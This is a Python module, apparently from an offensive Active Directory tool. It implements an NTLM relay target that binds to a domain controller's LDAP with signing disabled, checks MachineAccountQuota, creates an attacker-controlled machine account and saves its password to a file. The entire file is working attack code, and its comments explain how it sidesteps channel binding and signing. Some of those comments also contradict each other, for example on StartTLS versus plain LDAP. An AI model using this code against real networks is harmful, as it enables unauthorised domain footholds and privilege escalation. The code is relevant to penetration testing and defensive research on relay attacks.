"""LDAP relay target: add a computer account via relayed NTLM.

Flow
----
1. Receive a completed SPNEGORelay GSSAPI context from the relay engine.
2. Open a raw TCP connection to the DC's LDAP port (389, no LDAPS — LDAPS
   requires channel binding which is incompatible with NTLM relay).
3. Inject the relay GSSAPI as the client auth context of MSLDAPClientConnection
   so the NTLM tokens flow through the relay handler, not a fresh credential.
4. After the LDAP bind succeeds, use MSLDAPClient to call add_computer().

Why no LDAPS:
  LDAPS enforces channel binding by default on modern DCs.  Channel binding
  binds the TLS session to the auth tokens, which the relay handler cannot
  satisfy — it would need to decrypt and re-encrypt with a different TLS cert.
  Port 389 avoids this entirely and is typically not enforced (default config).

The target is drop-in compatible with any RelayTarget consumer that passes a
RelayAuthentication containing a relay-mode GSSAPI context.
"""

from __future__ import annotations

from dataclasses import dataclass

from adscan_core import telemetry
from adscan_internal.rich_output import mark_sensitive, print_info_debug, print_success
from adscan_internal.services.relay.core import RelayAuthentication, RelayTargetResult
from adscan_internal.services.relay.display import print_relay_captured
from adscan_internal.services.relay.identity import extract_ntlm_identity
from adscan_internal.services.machine_account_provisioning_service import (
    build_machine_account_attributes,
    generate_machine_account_name,
    generate_machine_account_password,
)


@dataclass(frozen=True)
class LDAPAddComputerConfig:
    """Settings for the LDAP add-computer relay target.

    Args:
        dc_ip:          IP address of the domain controller to relay to.
        domain:         AD domain name (used for display and SPN construction).
        ldap_port:      LDAP port.  389 only — LDAPS requires channel binding.
        computer_name:  Desired machine account name (without ``$``).  If
                        omitted, a random ``ADSCNxxxx$`` name is generated.
        computer_password: Desired machine account password.  If omitted,
                        a 16-char random password is generated by badldap.
        output_dir:     Directory where a ``result.txt`` with the computer
                        name and password is written.  ``None`` skips the file.
        disable_signing: Pass ``True`` to tell badldap not to negotiate LDAP
                        signing.  Relay contexts cannot sign; signing must be
                        disabled (default ``True``).
        enforce_maq_preflight: Check domain MAQ and current creator count for
                        the relayed principal before adding the computer.
    """

    dc_ip: str
    domain: str
    ldap_port: int = 389
    computer_name: str | None = None
    computer_password: str | None = None
    output_dir: str | None = None
    disable_signing: bool = True
    enforce_maq_preflight: bool = True


class LDAPAddComputerTarget:
    """Relay target: relayed NTLM LDAP bind → add machine account on the DC.

    Compatible with the ``RelayTarget`` protocol expected by ``RelayEngine``.
    """

    name = "ldap-add-computer"
    technique = "LDAP-ADD-COMPUTER"

    def __init__(self, config: LDAPAddComputerConfig) -> None:
        self.config = config

    async def run(self, authentication: RelayAuthentication) -> RelayTargetResult:
        domain, username = extract_ntlm_identity(authentication.gssapi)
        principal = (
            f"{domain}\\{username}" if domain and username else (username or "?")
        )
        print_relay_captured(principal, self.config.dc_ip, self.technique)

        try:
            computer_sam, password, dn = await _relay_add_computer(
                gssapi=authentication.gssapi,
                dc_ip=self.config.dc_ip,
                domain=self.config.domain,
                ldap_port=self.config.ldap_port,
                computer_name=self.config.computer_name,
                computer_password=self.config.computer_password,
                disable_signing=self.config.disable_signing,
                enforce_maq_preflight=self.config.enforce_maq_preflight,
                relayed_username=username or "",
            )
        except Exception as exc:
            telemetry.capture_exception(exc)
            return RelayTargetResult(
                target_name=self.name,
                success=False,
                technique=self.technique,
                principal=principal,
                error=str(exc),
            )

        pwd_note = "" if password else " (password not set — unsigned session)"
        print_success(
            f"[ldap-add-computer] Created {mark_sensitive(computer_sam, 'user')} "
            f"on {mark_sensitive(self.config.dc_ip, 'hostname')} "
            f"as {mark_sensitive(principal, 'user')}{pwd_note}"
        )

        artifact_paths: tuple[str, ...] = ()
        if self.config.output_dir:
            path = _write_result(self.config.output_dir, computer_sam, password, dn)
            if path:
                artifact_paths = (path,)

        return RelayTargetResult(
            target_name=self.name,
            success=True,
            technique=self.technique,
            principal=principal,
            artifact_paths=artifact_paths,
            metadata={
                "computer_sam": computer_sam,
                "computer_dn": dn or "",
                "dc_ip": self.config.dc_ip,
                "relayed_from": principal,
                "password_known": bool(password),
            },
        )


async def _relay_add_computer(
    *,
    gssapi: object,
    dc_ip: str,
    domain: str,
    ldap_port: int = 389,
    computer_name: str | None = None,
    computer_password: str | None = None,
    disable_signing: bool = True,
    enforce_maq_preflight: bool = True,
    relayed_username: str = "",
) -> tuple[str, str, str | None]:
    """Authenticate to DC LDAP via SICILY NTLM relay and add a computer account.

    Uses badldap's SICILY bind path (raw NTLM tokens, no SPNEGO wrapping) so
    the DC never negotiates LDAP signing — identical to ntlmrelayx's approach.

    Returns (sAMAccountName, password, distinguishedName).
    Raises on any failure so the caller can wrap in RelayTargetResult.
    """
    from adscan_internal.services.relay.ldap_relay_session import (  # noqa: PLC0415
        establish_relay_ldap_session,
    )

    client, raw_conn, base_dn = await establish_relay_ldap_session(
        gssapi=gssapi,
        dc_ip=dc_ip,
        domain=domain,
        ldap_port=ldap_port,
        disable_signing=disable_signing,
    )

    if enforce_maq_preflight and relayed_username:
        can_create, reason = await _relay_can_create_machine(
            client=client,
            base_dn=base_dn,
            relayed_username=relayed_username,
        )
        if can_create is False:
            raise RuntimeError(
                reason or "MachineAccountQuota exhausted for relayed principal"
            )

    desired_name = computer_name or generate_machine_account_name()
    sam, password, dn = await _add_computer_relay(
        client=client,
        raw_conn=raw_conn,
        computer_name=desired_name,
        computer_password=computer_password,
        base_dn=base_dn,
    )

    try:
        await raw_conn.disconnect()
    except Exception:
        pass

    return sam, password, dn


async def _relay_can_create_machine(
    *,
    client: object,
    base_dn: str,
    relayed_username: str,
) -> tuple[bool | None, str | None]:
    """Best-effort MAQ preflight using the already relayed LDAP session."""
    try:
        quota = await _relay_read_domain_maq(client=client, base_dn=base_dn)
        if quota is None:
            return None, None
        if quota <= 0:
            return False, "domain MachineAccountQuota is 0"
        actor_sid = await _relay_resolve_actor_sid(
            client=client,
            base_dn=base_dn,
            relayed_username=relayed_username,
        )
        if not actor_sid:
            return None, None
        created = await _relay_count_created_machines(
            client=client,
            base_dn=base_dn,
            actor_sid=actor_sid,
        )
        remaining = quota - created
        print_info_debug(
            "[ldap-add-computer] MAQ preflight: "
            f"user={mark_sensitive(relayed_username, 'user')} quota={quota} created={created} remaining={remaining}"
        )
        if remaining <= 0:
            return False, "relayed principal MachineAccountQuota exhausted"
        return True, None
    except Exception as exc:  # noqa: BLE001
        telemetry.capture_exception(exc)
        print_info_debug(f"[ldap-add-computer] MAQ preflight skipped: {exc}")
        return None, None


async def _relay_read_domain_maq(*, client: object, base_dn: str) -> int | None:
    """Read domain MAQ through an existing badldap client."""
    async for item, err in client.pagedsearch(  # type: ignore[attr-defined]
        "(objectClass=domainDNS)",
        ["ms-DS-MachineAccountQuota"],
        tree=base_dn,
        search_scope=0,
        raw=True,
    ):
        if err is not None:
            raise err
        attrs = dict(item.get("attributes", {}) or {})
        raw_value = attrs.get("ms-DS-MachineAccountQuota")
        return _first_int(raw_value)
    return None


async def _relay_resolve_actor_sid(
    *,
    client: object,
    base_dn: str,
    relayed_username: str,
) -> str | None:
    """Resolve the relayed username to a SID through the relayed LDAP session."""
    from adscan_internal.services.machine_account_provisioning_service import (  # noqa: PLC0415
        _sid_bytes_to_str,
    )

    username = _ldap_filter_escape(str(relayed_username or "").strip())
    if not username:
        return None
    async for item, err in client.pagedsearch(  # type: ignore[attr-defined]
        f"(sAMAccountName={username})",
        ["objectSid"],
        tree=base_dn,
        raw=True,
    ):
        if err is not None:
            raise err
        attrs = dict(item.get("attributes", {}) or {})
        raw_sid = _first_value(attrs.get("objectSid"))
        if isinstance(raw_sid, bytes):
            return _sid_bytes_to_str(raw_sid)
        return str(raw_sid) if raw_sid else None
    return None


async def _relay_count_created_machines(
    *,
    client: object,
    base_dn: str,
    actor_sid: str,
) -> int:
    """Count machines already created by the relayed principal."""
    from adscan_internal.services.machine_account_provisioning_service import (  # noqa: PLC0415
        _sid_to_ldap_filter_bytes,
    )

    count = 0
    sid_filter = _sid_to_ldap_filter_bytes(actor_sid)
    async for _item, err in client.pagedsearch(  # type: ignore[attr-defined]
        f"(&(objectClass=computer)(mS-DS-CreatorSID={sid_filter}))",
        ["sAMAccountName"],
        tree=base_dn,
        raw=True,
    ):
        if err is not None:
            raise err
        count += 1
    return count


def _first_value(value: object) -> object | None:
    """Return the first LDAP attribute value from common badldap shapes."""
    if value is None:
        return None
    if isinstance(value, (list, tuple, set)):
        return next(iter(value), None)
    return value


def _first_int(value: object) -> int | None:
    """Return the first LDAP attribute value parsed as an integer."""
    first = _first_value(value)
    if first is None:
        return None
    if isinstance(first, bytes):
        first = first.decode("utf-8", errors="ignore")
    try:
        return int(str(first))
    except (TypeError, ValueError):
        return None


def _ldap_filter_escape(value: str) -> str:
    """Escape a value for use in an LDAP equality filter."""
    return (
        str(value)
        .replace("\\", r"\5c")
        .replace("*", r"\2a")
        .replace("(", r"\28")
        .replace(")", r"\29")
        .replace("\x00", r"\00")
    )


async def _add_computer_relay(
    *,
    client: object,
    raw_conn: object,
    computer_name: str,
    computer_password: str | None,
    base_dn: str,
) -> tuple[str, str, str | None]:
    """Add a computer account over a relay LDAP session (TLS via StartTLS).

    unicodePwd is included in the initial ADD so that the DC atomically creates
    the account with the correct password.  StartTLS must have been negotiated
    before this call; without TLS the DC rejects unicodePwd writes.

    Returns (sAMAccountName, password, distinguishedName).
    Raises on any failure.
    """
    if not computer_name.endswith("$"):
        computer_name += "$"
    password = computer_password or generate_machine_account_password(16)

    domain = base_dn.replace("DC=", "").replace("=", "").replace(",", ".")
    cn = computer_name.rstrip("$")
    dn = f"CN={cn},CN=Computers,{base_dn}"

    attributes = build_machine_account_attributes(
        computer_name=computer_name,
        domain=domain,
    )
    # unicodePwd must be present in the ADD request — the DC rejects computer
    # account creation without it (ERROR_DS_MISSING_REQUIRED_ATT).
    attributes["unicodePwd"] = f'"{password}"'

    _, err = await raw_conn.add(dn, attributes)
    if err is not None:
        raise RuntimeError(f"LDAP add computer failed: {err}")

    print_info_debug(f"[ldap-add-computer] computer account created: {dn}")
    return computer_name, password, dn


def _write_result(
    output_dir: str, sam: str, password: str, dn: str | None
) -> str | None:
    """Write computer credentials to a text file; return the path on success."""
    try:
        import pathlib

        out = pathlib.Path(output_dir)
        out.mkdir(parents=True, exist_ok=True)
        path = out / f"ldap_add_computer_{sam.rstrip('$')}.txt"
        lines = [
            f"sAMAccountName: {sam}",
            f"Password:       {password}",
        ]
        if dn:
            lines.append(f"DN:             {dn}")
        path.write_text("\n".join(lines) + "\n")
        return str(path)
    except Exception as exc:
        telemetry.capture_exception(exc)
        return None


__all__ = [
    "LDAPAddComputerConfig",
    "LDAPAddComputerTarget",
]
